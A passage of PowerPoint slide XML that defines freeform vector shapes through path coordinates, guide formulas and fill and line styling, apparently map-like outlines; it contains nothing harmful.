                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="12"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36446" name="Freeform 178"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2782" y="2723"/>
                <a:ext cx="188" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 180 w 188"/>
                  <a:gd name="T1" fmla="*/ 20 h 153"/>
                  <a:gd name="T2" fmla="*/ 186 w 188"/>
                  <a:gd name="T3" fmla="*/ 26 h 153"/>
                  <a:gd name="T4" fmla="*/ 187 w 188"/>
                  <a:gd name="T5" fmla="*/ 38 h 153"/>
                  <a:gd name="T6" fmla="*/ 178 w 188"/>
                  <a:gd name="T7" fmla="*/ 42 h 153"/>
                  <a:gd name="T8" fmla="*/ 168 w 188"/>
                  <a:gd name="T9" fmla="*/ 62 h 153"/>
                  <a:gd name="T10" fmla="*/ 161 w 188"/>
                  <a:gd name="T11" fmla="*/ 70 h 153"/>
                  <a:gd name="T12" fmla="*/ 157 w 188"/>
                  <a:gd name="T13" fmla="*/ 84 h 153"/>
                  <a:gd name="T14" fmla="*/ 150 w 188"/>
                  <a:gd name="T15" fmla="*/ 92 h 153"/>
                  <a:gd name="T16" fmla="*/ 138 w 188"/>
                  <a:gd name="T17" fmla="*/ 116 h 153"/>
                  <a:gd name="T18" fmla="*/ 133 w 188"/>
                  <a:gd name="T19" fmla="*/ 119 h 153"/>
                  <a:gd name="T20" fmla="*/ 119 w 188"/>
                  <a:gd name="T21" fmla="*/ 111 h 153"/>
                  <a:gd name="T22" fmla="*/ 101 w 188"/>
                  <a:gd name="T23" fmla="*/ 126 h 153"/>
                  <a:gd name="T24" fmla="*/ 96 w 188"/>
                  <a:gd name="T25" fmla="*/ 141 h 153"/>
                  <a:gd name="T26" fmla="*/ 90 w 188"/>
                  <a:gd name="T27" fmla="*/ 145 h 153"/>
                  <a:gd name="T28" fmla="*/ 89 w 188"/>
                  <a:gd name="T29" fmla="*/ 147 h 153"/>
                  <a:gd name="T30" fmla="*/ 82 w 188"/>
                  <a:gd name="T31" fmla="*/ 150 h 153"/>
                  <a:gd name="T32" fmla="*/ 69 w 188"/>
                  <a:gd name="T33" fmla="*/ 149 h 153"/>
                  <a:gd name="T34" fmla="*/ 63 w 188"/>
                  <a:gd name="T35" fmla="*/ 152 h 153"/>
                  <a:gd name="T36" fmla="*/ 46 w 188"/>
                  <a:gd name="T37" fmla="*/ 147 h 153"/>
                  <a:gd name="T38" fmla="*/ 42 w 188"/>
                  <a:gd name="T39" fmla="*/ 136 h 153"/>
                  <a:gd name="T40" fmla="*/ 39 w 188"/>
                  <a:gd name="T41" fmla="*/ 131 h 153"/>
                  <a:gd name="T42" fmla="*/ 31 w 188"/>
                  <a:gd name="T43" fmla="*/ 122 h 153"/>
                  <a:gd name="T44" fmla="*/ 20 w 188"/>
                  <a:gd name="T45" fmla="*/ 116 h 153"/>
                  <a:gd name="T46" fmla="*/ 12 w 188"/>
                  <a:gd name="T47" fmla="*/ 119 h 153"/>
                  <a:gd name="T48" fmla="*/ 1 w 188"/>
                  <a:gd name="T49" fmla="*/ 118 h 153"/>
                  <a:gd name="T50" fmla="*/ 1 w 188"/>
                  <a:gd name="T51" fmla="*/ 92 h 153"/>
                  <a:gd name="T52" fmla="*/ 1 w 188"/>
                  <a:gd name="T53" fmla="*/ 80 h 153"/>
                  <a:gd name="T54" fmla="*/ 8 w 188"/>
                  <a:gd name="T55" fmla="*/ 76 h 153"/>
                  <a:gd name="T56" fmla="*/ 8 w 188"/>
                  <a:gd name="T57" fmla="*/ 66 h 153"/>
                  <a:gd name="T58" fmla="*/ 16 w 188"/>
                  <a:gd name="T59" fmla="*/ 57 h 153"/>
                  <a:gd name="T60" fmla="*/ 14 w 188"/>
                  <a:gd name="T61" fmla="*/ 39 h 153"/>
                  <a:gd name="T62" fmla="*/ 16 w 188"/>
                  <a:gd name="T63" fmla="*/ 20 h 153"/>
                  <a:gd name="T64" fmla="*/ 28 w 188"/>
                  <a:gd name="T65" fmla="*/ 2 h 153"/>
                  <a:gd name="T66" fmla="*/ 52 w 188"/>
                  <a:gd name="T67" fmla="*/ 1 h 153"/>
                  <a:gd name="T68" fmla="*/ 67 w 188"/>
                  <a:gd name="T69" fmla="*/ 13 h 153"/>
                  <a:gd name="T70" fmla="*/ 83 w 188"/>
                  <a:gd name="T71" fmla="*/ 8 h 153"/>
                  <a:gd name="T72" fmla="*/ 101 w 188"/>
                  <a:gd name="T73" fmla="*/ 16 h 153"/>
                  <a:gd name="T74" fmla="*/ 114 w 188"/>
                  <a:gd name="T75" fmla="*/ 12 h 153"/>
                  <a:gd name="T76" fmla="*/ 127 w 188"/>
                  <a:gd name="T77" fmla="*/ 7 h 153"/>
                  <a:gd name="T78" fmla="*/ 142 w 188"/>
                  <a:gd name="T79" fmla="*/ 9 h 153"/>
                  <a:gd name="T80" fmla="*/ 153 w 188"/>
                  <a:gd name="T81" fmla="*/ 11 h 153"/>
                  <a:gd name="T82" fmla="*/ 165 w 188"/>
                  <a:gd name="T83" fmla="*/ 3 h 153"/>
                  <a:gd name="T84" fmla="*/ 177 w 188"/>
                  <a:gd name="T85" fmla="*/ 9 h 153"/>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88"/>
                  <a:gd name="T130" fmla="*/ 0 h 153"/>
                  <a:gd name="T131" fmla="*/ 188 w 188"/>
                  <a:gd name="T132" fmla="*/ 153 h 153"/>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88" h="153">
                    <a:moveTo>
                      <a:pt x="180" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="179" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="12"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36447" name="Freeform 179"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3152" y="2208"/>
                <a:ext cx="298" cy="127"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 288 w 298"/>
                  <a:gd name="T1" fmla="*/ 105 h 127"/>
                  <a:gd name="T2" fmla="*/ 282 w 298"/>
                  <a:gd name="T3" fmla="*/ 100 h 127"/>
                  <a:gd name="T4" fmla="*/ 266 w 298"/>
                  <a:gd name="T5" fmla="*/ 98 h 127"/>
                  <a:gd name="T6" fmla="*/ 258 w 298"/>
                  <a:gd name="T7" fmla="*/ 100 h 127"/>
                  <a:gd name="T8" fmla="*/ 231 w 298"/>
                  <a:gd name="T9" fmla="*/ 104 h 127"/>
                  <a:gd name="T10" fmla="*/ 194 w 298"/>
                  <a:gd name="T11" fmla="*/ 108 h 127"/>
                  <a:gd name="T12" fmla="*/ 170 w 298"/>
                  <a:gd name="T13" fmla="*/ 110 h 127"/>
                  <a:gd name="T14" fmla="*/ 170 w 298"/>
                  <a:gd name="T15" fmla="*/ 120 h 127"/>
                  <a:gd name="T16" fmla="*/ 161 w 298"/>
                  <a:gd name="T17" fmla="*/ 127 h 127"/>
                  <a:gd name="T18" fmla="*/ 154 w 298"/>
                  <a:gd name="T19" fmla="*/ 120 h 127"/>
                  <a:gd name="T20" fmla="*/ 158 w 298"/>
                  <a:gd name="T21" fmla="*/ 109 h 127"/>
                  <a:gd name="T22" fmla="*/ 151 w 298"/>
                  <a:gd name="T23" fmla="*/ 113 h 127"/>
                  <a:gd name="T24" fmla="*/ 146 w 298"/>
                  <a:gd name="T25" fmla="*/ 116 h 127"/>
                  <a:gd name="T26" fmla="*/ 128 w 298"/>
                  <a:gd name="T27" fmla="*/ 116 h 127"/>
                  <a:gd name="T28" fmla="*/ 124 w 298"/>
                  <a:gd name="T29" fmla="*/ 122 h 127"/>
                  <a:gd name="T30" fmla="*/ 105 w 298"/>
                  <a:gd name="T31" fmla="*/ 124 h 127"/>
                  <a:gd name="T32" fmla="*/ 72 w 298"/>
                  <a:gd name="T33" fmla="*/ 109 h 127"/>
                  <a:gd name="T34" fmla="*/ 67 w 298"/>
                  <a:gd name="T35" fmla="*/ 121 h 127"/>
                  <a:gd name="T36" fmla="*/ 47 w 298"/>
                  <a:gd name="T37" fmla="*/ 110 h 127"/>
                  <a:gd name="T38" fmla="*/ 30 w 298"/>
                  <a:gd name="T39" fmla="*/ 110 h 127"/>
                  <a:gd name="T40" fmla="*/ 20 w 298"/>
                  <a:gd name="T41" fmla="*/ 106 h 127"/>
                  <a:gd name="T42" fmla="*/ 18 w 298"/>
                  <a:gd name="T43" fmla="*/ 97 h 127"/>
                  <a:gd name="T44" fmla="*/ 15 w 298"/>
                  <a:gd name="T45" fmla="*/ 85 h 127"/>
                  <a:gd name="T46" fmla="*/ 7 w 298"/>
                  <a:gd name="T47" fmla="*/ 75 h 127"/>
                  <a:gd name="T48" fmla="*/ 13 w 298"/>
                  <a:gd name="T49" fmla="*/ 72 h 127"/>
                  <a:gd name="T50" fmla="*/ 16 w 298"/>
                  <a:gd name="T51" fmla="*/ 66 h 127"/>
                  <a:gd name="T52" fmla="*/ 12 w 298"/>
                  <a:gd name="T53" fmla="*/ 61 h 127"/>
                  <a:gd name="T54" fmla="*/ 13 w 298"/>
                  <a:gd name="T55" fmla="*/ 54 h 127"/>
                  <a:gd name="T56" fmla="*/ 2 w 298"/>
                  <a:gd name="T57" fmla="*/ 55 h 127"/>
